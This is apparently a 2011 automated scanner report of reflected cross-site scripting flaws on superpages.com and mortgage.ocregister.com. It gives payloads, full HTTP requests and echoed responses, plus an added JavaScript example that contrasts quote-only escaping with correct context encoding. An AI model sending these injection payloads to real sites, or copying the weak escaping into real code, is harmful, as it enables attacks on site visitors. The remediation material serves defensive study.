<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... = null; // TEST: that this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?spheader=true9124c"-alert(1)-"2c2736523e0&L=";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the FP request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bf14\'%3balert(1)//32bd7f650df was submitted in the FP parameter. This input was echoed as 5bf14\\';alert(1)//32bd7f650df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes, before the quotation marks are escaped.
The value of the a request parameter is copied into the HTML document as plain text between tags. The payload f2f57<script>alert(1)</script>151fa128c48 was submitted in the a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: Unspecified
Content-Length: 637
Date: Thu, 03 Feb 2011 18:57:38 GMT
SP_SearchManager._ApplyResults(1,0,[],[],false,"<div class=message>No 'banksf2f57<script>alert(1)</script>151fa128c48' found on this map.<br><br><div class=solution>Try these solutions<br><br><span cl ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81705"><script>alert(1)</script>5be155ad2e1 was submitted in the cat parameter. This input was echoed as 81705\"><script>alert(1)</script>5be155ad2e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?cat=81705"><script>alert(1)</script>5be155ad2e1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62649
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/?cat=81705\"><script>alert(1)</script>5be155ad2e1feed/" /> ...[SNIP]...
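The findings above show three distinct failure patterns: the FP parameter is protected only by a backslash placed before quotation marks, which an attacker-supplied backslash defeats; the spUrl reflections are placed in a JavaScript string with no escaping at all; and the cat parameter receives the same backslash-style escaping inside an HTML attribute, where a backslash has no meaning and the quote still terminates the attribute. The JavaScript below is an added example, not code from the scanned applications or from the scanner. It reproduces each weak scheme, uses a minimal string-literal lexer (which consumes the character after a backslash exactly as the JavaScript parser does) to decide whether the reported payload escapes its context, and shows the context-specific encoders that close the hole. The function names, the `var spX = '...'` template and the summary object are illustrative assumptions; the payloads are copied from the report.

```javascript
// Added example: reproduces the escaping schemes observed in the report and
// shows context-correct encoding. Function names are illustrative assumptions.

// Weak defence observed on the FP parameter: a backslash before quotes only.
// The backslash in the input is left alone, so an attacker's \' becomes \\'
// and the quote survives as a string terminator.
function escapeQuotesOnly(s) {
  return s.replace(/['"]/g, (q) => '\\' + q);
}

// No defence at all, as observed for the spUrl reflections.
function identity(s) {
  return s;
}

// Correct encoding for data inside a quoted JavaScript string literal:
// backslash, both quotes, the HTML-significant characters (so </script>
// can never appear) and line terminators all become \xHH or \uHHHH escapes.
function jsStringEncode(s) {
  return s.replace(/[\\'"<>&\r\n\u2028\u2029]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Correct encoding for data inside a quoted HTML attribute or a text node.
function htmlAttrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Minimal lexer for one JavaScript string literal: given the index of its
// opening quote, return the index of the quote that closes it, or -1.
// A backslash consumes the following character, as in the real parser.
function jsStringLiteralEnd(src, start) {
  const quote = src[start];
  for (let i = start + 1; i < src.length; i++) {
    if (src[i] === '\\') { i += 1; continue; }
    if (src[i] === quote) return i;
  }
  return -1;
}

// Embed encoder(payload) in   var spX = <quote>...<quote>;   and report
// whether the literal closes anywhere other than where the template intends.
function jsBreakout(payload, encoder, quote = "'") {
  const prefix = 'var spX = ' + quote;
  const encoded = encoder(payload);
  const src = prefix + encoded + quote + ';';
  return jsStringLiteralEnd(src, prefix.length - 1) !== prefix.length + encoded.length;
}

// A double-quoted HTML attribute ends at the first raw double quote; HTML has
// no backslash escaping, so \" is just a backslash followed by the terminator.
function attrBreakout(payload, encoder) {
  return encoder(payload).includes('"');
}

// Payloads copied from the report (the FP one contains a literal backslash).
const FP_PAYLOAD = "5bf14\\';alert(1)//32bd7f650df";
const SPURL_PAYLOAD = 'b305f"-alert(1)-"5b1a94486f6';
const CAT_PAYLOAD = '81705"><script>alert(1)</script>5be155ad2e1';

// One entry per (payload, defence) pair: true means the payload escapes its
// context, i.e. the injection the report describes is reproducible.
function findings() {
  return {
    fpQuoteOnly:  jsBreakout(FP_PAYLOAD, escapeQuotesOnly),       // true
    fpEncoded:    jsBreakout(FP_PAYLOAD, jsStringEncode),         // false
    spUrlRaw:     jsBreakout(SPURL_PAYLOAD, identity, '"'),       // true
    spUrlEncoded: jsBreakout(SPURL_PAYLOAD, jsStringEncode, '"'), // false
    catSlashes:   attrBreakout(CAT_PAYLOAD, escapeQuotesOnly),    // true
    catEncoded:   attrBreakout(CAT_PAYLOAD, htmlAttrEncode),      // false
  };
}

console.log(findings());
```

The order of operations in `jsStringEncode` is what the FP finding hinges on: the backslash must be encoded before (or together with) the quotation marks, otherwise the escaping added for the quote is itself escaped by the attacker's backslash. The cat finding is the complementary mistake, a JavaScript-style escaper applied to an HTML context; the encoder has to match the context the data lands in, not the language the server is written in.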
1.209. http://mortgage.ocregister.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9060"><script>alert(1)</script>27ab659d801 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9060\"><script>alert(1)</script>27ab659d801 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d9060"><script>alert(1)</script>27ab659d801=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99645
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52dcb"><script>alert(1)</script>39ced908d26 was submitted in the REST URL parameter 1. This input was echoed as 52dcb\"><script>alert(1)</script>39ced908d26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200752dcb"><script>alert(1)</script>39ced908d26/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200752dcb\"><script>alert(1)</script>39ced908d26/02/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b0a6"><script>alert(1)</script>92197aa8e9d was submitted in the REST URL parameter 2. This input was echoed as 6b0a6\"><script>alert(1)</script>92197aa8e9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/026b0a6"><script>alert(1)</script>92197aa8e9d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:15:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:06 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/026b0a6\"><script>alert(1)</script>92197aa8e9d/feed/" /> ...[SNIP]...
1.212. http://mortgage.ocregister.com/2007/02/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/02/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3653d"><script>alert(1)</script>5061bfdeb82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3653d\"><script>alert(1)</script>5061bfdeb82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/02/?3653d"><script>alert(1)</script>5061bfdeb82=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/02/?3653d\"><script>alert(1)</script>5061bfdeb82=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b96d6"><script>alert(1)</script>608b7c95f14 was submitted in the REST URL parameter 1. This input was echoed as b96d6\"><script>alert(1)</script>608b7c95f14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007b96d6"><script>alert(1)</script>608b7c95f14/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007b96d6\"><script>alert(1)</script>608b7c95f14/03/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 832cb"><script>alert(1)</script>2b5aea2aeb2 was submitted in the REST URL parameter 2. This input was echoed as 832cb\"><script>alert(1)</script>2b5aea2aeb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/03832cb"><script>alert(1)</script>2b5aea2aeb2/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/03832cb\"><script>alert(1)</script>2b5aea2aeb2/feed/" /> ...[SNIP]...
1.215. http://mortgage.ocregister.com/2007/03/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/03/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10aad"><script>alert(1)</script>8ad5229eab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10aad\"><script>alert(1)</script>8ad5229eab7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/03/?10aad"><script>alert(1)</script>8ad5229eab7=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86849
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/03/?10aad\"><script>alert(1)</script>8ad5229eab7=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55996"><script>alert(1)</script>f21c39f9bf3 was submitted in the REST URL parameter 1. This input was echoed as 55996\"><script>alert(1)</script>f21c39f9bf3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200755996"><script>alert(1)</script>f21c39f9bf3/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200755996\"><script>alert(1)</script>f21c39f9bf3/04/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96ffb"><script>alert(1)</script>43052a33670 was submitted in the REST URL parameter 2. This input was echoed as 96ffb\"><script>alert(1)</script>43052a33670 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/0496ffb"><script>alert(1)</script>43052a33670/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/0496ffb\"><script>alert(1)</script>43052a33670/feed/" /> ...[SNIP]...
1.218. http://mortgage.ocregister.com/2007/04/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/04/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74dd0"><script>alert(1)</script>2eca39d79aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74dd0\"><script>alert(1)</script>2eca39d79aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/04/?74dd0"><script>alert(1)</script>2eca39d79aa=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86567
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/04/?74dd0\"><script>alert(1)</script>2eca39d79aa=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a5d1"><script>alert(1)</script>84bac8fb2df was submitted in the REST URL parameter 1. This input was echoed as 7a5d1\"><script>alert(1)</script>84bac8fb2df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20077a5d1"><script>alert(1)</script>84bac8fb2df/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20077a5d1\"><script>alert(1)</script>84bac8fb2df/05/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5186"><script>alert(1)</script>5f95e6db221 was submitted in the REST URL parameter 2. This input was echoed as e5186\"><script>alert(1)</script>5f95e6db221 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/05e5186"><script>alert(1)</script>5f95e6db221/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
